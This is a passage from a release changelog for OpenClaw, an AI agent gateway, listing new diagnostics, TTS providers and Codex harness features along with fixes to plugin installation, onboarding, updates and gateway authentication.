<li>Diagnostics/trace: add an internal traceparent propagation helper that only formats trusted dispatcher metadata, keeping plugin-emitted diagnostic traces out of outbound propagation by default. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Diagnostics/OTEL: add bounded outbound message delivery lifecycle diagnostics and export them as low-cardinality delivery spans/metrics without message body, recipient, room, or media-path data. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4327526859" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71471" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71471/hovercard" href="https://github.com/openclaw/openclaw/pull/71471">#71471</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jlapenna/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jlapenna">@jlapenna</a>.</li>
<li>Diagnostics/OTEL: emit bounded exec-process diagnostics and export them as <code>openclaw.exec</code> spans without exposing command text, working directories, or container identifiers. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4327444687" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71451" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71451/hovercard" href="https://github.com/openclaw/openclaw/pull/71451">#71451</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jlapenna/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jlapenna">@jlapenna</a>.</li>
<li>Diagnostics/OTEL: support <code>OPENCLAW_OTEL_PRELOADED=1</code> so the plugin can reuse an already-registered OpenTelemetry SDK while keeping OpenClaw diagnostic listeners wired. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4327404376" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71450" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71450/hovercard" href="https://github.com/openclaw/openclaw/pull/71450">#71450</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jlapenna/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jlapenna">@jlapenna</a>.</li>
<li>Providers/Xiaomi: add MiMo TTS as a bundled speech provider with MP3/WAV output and voice-note Opus transcoding. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4116510361" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/52376" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/52376/hovercard" href="https://github.com/openclaw/openclaw/issues/52376">#52376</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4149888425" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/55614" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/55614/hovercard" href="https://github.com/openclaw/openclaw/pull/55614">#55614</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zoujiejun/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zoujiejun">@zoujiejun</a>.</li>
<li>Providers/ElevenLabs: include <code>eleven_v3</code> in the bundled TTS model catalog so model selection surfaces can offer ElevenLabs v3. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4285755724" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68321" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/68321/hovercard" href="https://github.com/openclaw/openclaw/pull/68321">#68321</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/itsuzef/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/itsuzef">@itsuzef</a>.</li>
<li>Providers/Local CLI TTS: add a bundled local command speech provider with file/stdout input, voice-note Opus conversion, and telephony PCM output. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4158165001" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/56239" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/56239/hovercard" href="https://github.com/openclaw/openclaw/pull/56239">#56239</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/solar2ain/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/solar2ain">@solar2ain</a>.</li>
<li>Providers/Inworld: add Inworld as a bundled speech provider with streaming TTS synthesis, voice listing, voice-note output, and PCM telephony output. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4155025815" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/55972" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/55972/hovercard" href="https://github.com/openclaw/openclaw/pull/55972">#55972</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/cshape/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/cshape">@cshape</a>.</li>
<li>Providers/Volcengine: add Volcengine/BytePlus Seed Speech as a bundled TTS provider with API-key auth, native Ogg/Opus voice-note output, and MP3 audio-file output. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4150318584" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/55641" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/55641/hovercard" href="https://github.com/openclaw/openclaw/pull/55641">#55641</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/xuruiray/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/xuruiray">@xuruiray</a>.</li>
<li>Android/Talk Mode: expose Talk Mode in the Voice tab with runtime-owned voice capture modes and microphone foreground-service escalation. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/alex-latitude/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/alex-latitude">@alex-latitude</a>.</li>
<li>Providers/LiteLLM: register <code>litellm</code> as an image-generation provider so <code>image_generate model=litellm/...</code> calls and <code>agents.defaults.imageGenerationModel.fallbacks</code> entries resolve through the LiteLLM proxy. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zqchris/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zqchris">@zqchris</a>.</li>
<li>Providers/fal: add Seedance 2.0 reference-to-video models with multi-image, video, and audio reference input mapping plus model-specific capability limits for <code>video_generate</code>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shivanker/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shivanker">@shivanker</a>.</li>
<li>Codex harness: require Codex app-server <code>0.125.0</code> or newer and cover native MCP <code>PreToolUse</code>, <code>PostToolUse</code>, and <code>PermissionRequest</code> payloads through the OpenClaw hook relay.</li>
<li>Agents/Codex: teach prompts and <code>agents_list</code> to surface native Codex app-server availability so agents prefer <code>/codex ...</code> over Codex ACP unless ACP/acpx is explicit. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>ACPX/Droid: add Factory Droid to the live ACP bind Docker matrix, including <code>.factory</code> settings staging, <code>FACTORY_API_KEY</code> forwarding, and the single-agent <code>test:docker:live-acp-bind:droid</code> recipe.</li>
<li>TTS/personas: add provider-aware TTS personas with deterministic provider binding merges, <code>/tts persona</code> controls, gateway/CLI persona state, Google Gemini <code>audio-profile-v1</code> prompt wrapping, and OpenAI instruction mapping. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4318374088" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70748" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70748/hovercard" href="https://github.com/openclaw/openclaw/pull/70748">#70748</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/barronlroth/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/barronlroth">@barronlroth</a>.</li>
<li>Voice Wake: add trigger-based routing so macOS voice wake phrases can select a configured agent or session target, with Gateway routing APIs and node update events. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4006394318" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/30354" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/30354/hovercard" href="https://github.com/openclaw/openclaw/pull/30354">#30354</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/longbiaochen/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/longbiaochen">@longbiaochen</a>.</li>
</ul>
<h3>Fixes</h3>
<ul>
<li>Plugins/CLI: let flag-driven <code>openclaw channels add</code> install the selected channel plugin from its default source without opening an interactive prompt, fixing published npm Telegram setup in stdin-closed automation. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/codex/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/codex">@codex</a>.</li>
<li>Plugins/startup: load the default <code>memory-core</code> slot during Gateway startup when permitted so active-memory recall can call <code>memory_search</code> and <code>memory_get</code> without requiring an explicit <code>plugins.slots.memory</code> entry, while preserving <code>plugins.slots.memory: "none"</code>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/codex/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/codex">@codex</a>.</li>
<li>Plugins/CLI: prefer native require for compiled bundled plugin JavaScript before jiti so read-only config, status, device, and node commands avoid unnecessary transform overhead on slow hosts. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4221630999" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/62842" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/62842/hovercard" href="https://github.com/openclaw/openclaw/issues/62842">#62842</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Effet/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Effet">@Effet</a>.</li>
<li>Plugins/compat: inventory doctor-side deprecation migrations separately from runtime plugin compatibility so release sweeps preserve needed repairs while enforcing dated removal windows. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/compat: add missing dated compatibility records for legacy extension-api, memory registration, provider hook/type aliases, runtime aliases, channel SDK helpers, and approval/test utility shims. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/CLI: refresh the persisted registry after managed plugin files are removed so ClawHub uninstall cannot leave stale <code>plugins list</code> entries. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/codex/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/codex">@codex</a>.</li>
<li>Plugins/CLI: make plugin install and uninstall config writes conflict-aware, clear stale denylist entries on explicit reinstall/removal, and delete managed plugin files only after config/index commit succeeds. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/codex/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/codex">@codex</a>.</li>
<li>Plugins: fail <code>plugins update</code> when tracked plugin or hook updates error, keep bundled runtime-dependency repair behind restrictive allowlists, and reject package installs with unloadable extension entries. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/codex/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/codex">@codex</a>.</li>
<li>Gateway/chat: keep duplicate attachment-backed <code>chat.send</code> retries with the same idempotency key on the documented in-flight path so aborts still target the real active run. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4308621432" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70139" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70139/hovercard" href="https://github.com/openclaw/openclaw/issues/70139">#70139</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Feelw00/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Feelw00">@Feelw00</a>.</li>
<li>Plugins: share package entrypoint resolution between install and discovery, reject mismatched <code>runtimeExtensions</code>, and cache bundled runtime-dependency manifest reads during scans. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/codex/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/codex">@codex</a>.</li>
<li>Onboarding/setup: keep first-run config reads, plugin compatibility notices, and post-model sanity checks on cold metadata paths unless the user chooses to browse all models, avoiding full plugin/runtime catalog work between prompts. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Onboarding/auth: run manifest-owned provider auth choices through scoped setup providers so selecting OpenAI Codex browser/device auth no longer loads every provider runtime before OAuth starts. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Onboarding/auth: keep the post-auth default-model policy lookup on manifest/setup metadata so the next prompt appears without loading broad provider runtime. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Onboarding/models: keep skip-auth and provider-scoped model picker prompts off the full global model catalog path, and cache provider catalog hook resolution so setup no longer stalls after auth on large plugin registries. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Gateway/Bonjour: suppress known @homebridge/ciao cancellation and network assertion failures through scoped process handlers so malformed mDNS packets or restricted VPS networking disable/restart Bonjour instead of crashing the gateway. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4274075946" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/67578" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/67578/hovercard" href="https://github.com/openclaw/openclaw/issues/67578">#67578</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zenassist26-create/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zenassist26-create">@zenassist26-create</a>.</li>
<li>Discord: keep late clicks on already-resolved exec approval buttons quiet when elevated mode auto-resolved the request, while still surfacing real approval submission failures. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4265667453" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/66906" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/66906/hovercard" href="https://github.com/openclaw/openclaw/issues/66906">#66906</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rlerikse/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rlerikse">@rlerikse</a>.</li>
<li>Agents/subagents: deliver completed yielded-subagent results back to no-thread requester routes via direct fallback when the dormant parent announce turn produces no visible reply, and add QA-lab coverage for the regression. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Gateway/Tailscale: let Tailscale-authenticated Control UI operator sessions with browser device identity skip the device-pairing round trip while still rejecting device-less and node-role connections. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4330113557" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71986" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71986/hovercard" href="https://github.com/openclaw/openclaw/issues/71986">#71986</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jokedul/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jokedul">@jokedul</a>.</li>
<li>Doctor: honor <code>OPENCLAW_SERVICE_REPAIR_POLICY=external</code> by reporting gateway service health while skipping service install/start/restart/bootstrap, supervisor rewrites, and legacy service cleanup for externally managed environments. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>CLI/update: run package post-update doctor with <code>--fix</code> so package updates repair config migrations before restart. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>CLI/update: retry failed npm global updates with <code>--omit=optional</code> and ignore the superseded first failure when the fallback succeeds. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Plugins/uninstall: migrate and reset <code>plugins.slots.contextEngine</code> alongside memory slots when plugin ids change or selected plugins are removed. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Agents/Discord: keep raw <code>Agent failed before reply</code> runner failures out of Discord group/channel chats and show detailed runner errors in direct chats only when <code>/verbose</code> is enabled. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/codex/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/codex">@codex</a>.</li>
<li>UI/Windows: quote resolved pnpm <code>.cmd</code> launcher paths before spawning UI install/build/test commands so Node installs under <code>C:\Program Files</code> no longer fail as <code>C:\Program</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4072094242" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/45275" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/45275/hovercard" href="https://github.com/openclaw/openclaw/issues/45275">#45275</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Kobevictor/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Kobevictor">@Kobevictor</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stoppieboy/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stoppieboy">@stoppieboy</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/iubns/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/iubns">@iubns</a>.</li>
<li>Codex/agent: translate <code>--thinking minimal</code> to <code>low</code> for modern Codex models (gpt-5.5, gpt-5.4, gpt-5.4-mini, gpt-5.2) at request build time so the first turn is accepted instead of paying a wasted call + retry-with-low fallback. Older Codex models still receive <code>minimal</code> directly. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329994264" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71946" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71946/hovercard" href="https://github.com/openclaw/openclaw/issues/71946">#71946</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hclsys/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hclsys">@hclsys</a>.</li>
<li>Plugins/uninstall: remove tracked plugin files from their recorded managed extensions root even when the current state directory points somewhere else, so <code>openclaw plugins uninstall --force</code> does not leave the plugin discoverable. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Agents/runtime: add <code>agentRuntime.id</code> as the canonical config key, migrate legacy runtime-policy configs with <code>openclaw doctor --fix</code>, route canonical Anthropic models through <code>claude-cli</code> without passing CLI backend aliases to embedded harness selection, and load CLI backend owner plugins before channel startup. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4330015913" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71957" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71957/hovercard" href="https://github.com/openclaw/openclaw/issues/71957">#71957</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/WolvenRA/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/WolvenRA">@WolvenRA</a>.</li>
<li>CLI/update: guard Windows scheduled-task stops by state and timeout so auto-update restart cannot hang indefinitely on <code>schtasks /End</code> before stale-listener cleanup. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4306617089" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69970" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/69970/hovercard" href="https://github.com/openclaw/openclaw/issues/69970">#69970</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/yangswld/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/yangswld">@yangswld</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sherlock-huang/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sherlock-huang">@sherlock-huang</a>.</li>
<li>Windows install/Lobster: execute <code>pnpm.exe</code> directly when <code>npm_execpath</code> points at the native pnpm binary, add an installed-package fallback for the Lobster embedded runtime, and include the Lobster runner regression test in Windows CI. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4298637607" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69456" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/69456/hovercard" href="https://github.com/openclaw/openclaw/issues/69456">#69456</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/igormf/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/igormf">@igormf</a>.</li>
<li>Gateway/install: refresh loaded gateway service installs when the current service embeds stale gateway auth instead of returning already-installed, avoiding LaunchAgent token-mismatch loops after token rotation. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4318448606" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70752" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70752/hovercard" href="https://github.com/openclaw/openclaw/issues/70752">#70752</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hyspacex/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hyspacex">@hyspacex</a>.</li>
<li>Update: ignore bundled plugin <code>.openclaw-install-stage</code> directories during global install verification and packaged dist pruning so leftover runtime-dep staging files do not turn successful updates into <code>unexpected packaged dist file</code> failures. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329154464" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71752" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71752/hovercard" href="https://github.com/openclaw/openclaw/issues/71752">#71752</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/waynegault/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/waynegault">@waynegault</a>.</li>
<li>CLI/update: fail package updates when post-update plugin sync fails and refresh legacy npm plugin install records before trusting unchanged artifacts, preventing successful updates from restarting with stale or failed plugin state. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Release/update: reject pre-populated bundled plugin <code>.openclaw-install-stage</code> directories, including mixed-case path variants, before package inventory generation so release tarballs cannot ship poisoned runtime-dependency staging debris. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329154464" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71752" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71752/hovercard" href="https://github.com/openclaw/openclaw/issues/71752">#71752</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hclsys/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hclsys">@hclsys</a>.</li>
<li>Node runtime: keep node-host retry timers alive across Gateway restarts and exit on terminal credential pauses so supervised nodes do not become silent zombies. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4304346722" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69800" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/69800/hovercard" href="https://github.com/openclaw/openclaw/issues/69800">#69800</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/meroli28/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/meroli28">@meroli28</a>.</li>
<li>Gateway/plugins: stop persisted WhatsApp auth state from activating bundled channel runtime-dependency repair during startup when <code>channels.whatsapp</code> is absent, avoiding npm/git stalls on packaged Linux installs. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4330154277" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71994" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71994/hovercard" href="https://github.com/openclaw/openclaw/issues/71994">#71994</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/xiao398008/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/xiao398008">@xiao398008</a>.</li>
<li>Gateway/device tokens: enforce caller-scope containment inside token rotation and revocation so pairing-only sessions cannot mutate higher-scope operator tokens. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4330129522" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71990" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71990/hovercard" href="https://github.com/openclaw/openclaw/issues/71990">#71990</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/coygeek/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/coygeek">@coygeek</a>.</li>
<li>Plugins/channels: keep security checks, thread-binding placement, provider summaries, health formatting, and message action labels on read-only or already-loaded channel metadata instead of importing full channel runtime. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Plugins/status: keep config-only channel labels and status security summaries from importing plugin runtime modules just to render metadata. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Sessions/channels: stop group-session metadata from loading bundled channel runtime just to classify <code>#channel</code> subjects, using only already-loaded channel capabilities on that path. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
